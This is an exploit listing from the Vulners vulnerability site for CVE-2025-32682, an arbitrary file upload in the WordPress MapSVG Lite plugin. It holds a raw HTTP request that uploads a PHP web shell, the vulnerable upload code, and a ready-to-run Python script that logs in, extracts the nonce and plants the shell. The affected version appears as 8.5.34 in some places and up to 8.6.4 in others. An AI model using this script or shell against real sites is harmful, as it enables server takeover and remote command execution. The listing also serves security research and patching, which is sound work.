Vulners
Lucene search
📄 WordPress MapSVG Lite 8.5.34 Shell Upload
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | Exploit for CVE-2025-32682 | 18 Apr 202510:18 | – | githubexploit |
 | CVE-2025-32682 | 17 Apr 202516:48 | – | circl |
 | WordPress plugin MapSVG Lite 代码问题漏洞 | 17 Apr 202500:00 | – | cnnvd |
 | CVE-2025-32682 | 17 Apr 202515:46 | – | cve |
 | CVE-2025-32682 WordPress MapSVG Lite plugin <= 8.6.4 - Arbitrary File Upload Vulnerability | 17 Apr 202515:46 | – | cvelist |
 | EUVD-2025-11734 | 3 Oct 202520:07 | – | euvd |
 | CVE-2025-32682 | 17 Apr 202516:15 | – | nvd |
 | WordPress MapSVG Lite plugin <= 8.6.4 - Arbitrary File Upload Vulnerability | 15 Apr 202517:03 | – | patchstack |
 | PT-2025-17168 · Unknown · Mapsvg Lite | 17 Apr 202500:00 | – | ptsecurity |
 | CVE-2025-32682 | 25 Apr 202517:33 | – | redhatcve |
10
# 🐚 CVE-2025-32682 - Arbitrary File Upload in MapSVG Lite <= 8.5.34
## 📌 Plugin Details
- **Name:** MapSVG Lite
- **Affected Version:** <= 8.5.34
- **Vulnerability Type:** Arbitrary File Upload
- **CVE ID:** CVE-2025-32682
- **Published Date:** 15 April, 2025
- **CVSS Score:** 9.9 (Critical)
---
## 💥 Vulnerability Summary
The `MapSVG Lite` plugin for WordPress does not validate file types when uploading SVG files via its REST API endpoint:
```
/wp-json/mapsvg/v1/svgfile
```
This allows an authenticated attacker (Subscriber+) to upload arbitrary PHP files disguised as SVG, resulting in remote code execution (RCE).
---
## 📎 Proof of Concept (POC) - Raw HTTP Request
```http
POST /wp-json/mapsvg/v1/svgfile HTTP/1.1
Host: 192.168.100.74:888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://target.com/wp-admin/admin.php?page=mapsvg-config
X-WP-Nonce: 4febb3ff50
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------155355665422604566641836454807
Content-Length: 298
Origin: http://192.168.100.74:888
Connection: keep-alive
Cookie:
-----------------------------155355665422604566641836454807
Content-Disposition: form-data; name="file"; filename="nxploit.php"
Content-Type: text/xml
<!--?php
if(isset($_GET['cmd'])) {
system($_GET['cmd']);
}
?-->
-----------------------------155355665422604566641836454807--
```
### 🔍 Vulnerable Code Snippet
The following vulnerable code snippet from the `mapsvg-lite-interactive-vector-maps.php` file highlights the issue:
```php
public function uploadSVG() {
$file = $_FILES['file'];
$upload = wp_upload_bits($file['name'], null, file_get_contents($file['tmp_name']));
return new \WP_REST_Response(["file" => $upload], 200);
}
```
- ❌ **No filetype check**
- ❌ **No extension validation**
- ❌ **No sanitization of file contents**
This function is directly mapped to the REST endpoint `/wp-json/mapsvg/v1/svgfile`.
---
## 🧠 Exploitation Requirements
- ✅ Requires authentication (Subscriber+)
- 🛑 No filetype or content validation
---
## 🐍 POC 2 - Python Exploit Script
```python
# By: Nxploited | Khaled Alenazi
import requests
import argparse
import re
requests.packages.urllib3.disable_warnings()
session = requests.Session()
session.verify = False
user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", required=True)
parser.add_argument("-un", "--username", required=True)
parser.add_argument("-p", "--password", required=True)
args = parser.parse_args()
login_url = f"{args.url}/wp-login.php"
resp = session.post(login_url, data={
'log': args.username,
'pwd': args.password,
'rememberme': 'forever',
'wp-submit': 'Log In'
}, headers={"User-Agent": user_agent})
if 'wordpress_logged_in' not in str(session.cookies):
print("[-] Login failed")
exit()
print("[+] Logged in successfully.")
nonce_page = session.get(f"{args.url}/wp-admin/admin.php?page=mapsvg-config")
match = re.search(r'"nonce":"([a-f0-9]+)"', nonce_page.text)
if not match:
print("[-] Failed to extract nonce")
exit()
nonce = match.group(1)
print(f"[+] Found nonce: {nonce}")
upload_url = f"{args.url}/wp-json/mapsvg/v1/svgfile"
print(f"[+] Uploading file to: {upload_url}")
payload = {'file': ('nxploit.php', '<?php if(isset($_GET[\'cmd\'])){ system($_GET[\'cmd\']); } ?>', 'application/x-php')}
headers = {
'X-WP-Nonce': nonce,
'Referer': f"{args.url}/wp-admin/admin.php?page=mapsvg-config",
'X-Requested-With': 'XMLHttpRequest',
'User-Agent': user_agent
}
res = session.post(upload_url, files=payload, headers=headers)
try:
json_res = res.json()
print("[+] Server response (formatted):")
print("File Name :", json_res['file']['name'])
print("URL :", json_res['file']['relativeUrl'])
print("Path Short :", json_res['file']['pathShort'])
print("Server Path :", json_res['file']['serverPath'])
print("\nExploited By : Nxploited | Khaled Alenazi")
except:
print("[-] Upload failed or invalid response.")
```
---
## ☠️ Impact
Exploitation of this vulnerability allows an attacker to upload a `.php` web shell to the `/wp-content/uploads/mapsvg/` directory and execute arbitrary commands on the server.
---
## 👤 By:
**Nxploited | Khaled Alenazi**
---
## ⚠️ Disclaimer
This project is for **educational purposes only**. Unauthorized access to systems without permission is illegal.Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Apr 2025 00:00Current
8.9High risk
Vulners AI Score8.9
CVSS 3.19.9
EPSS0.00473
SSVC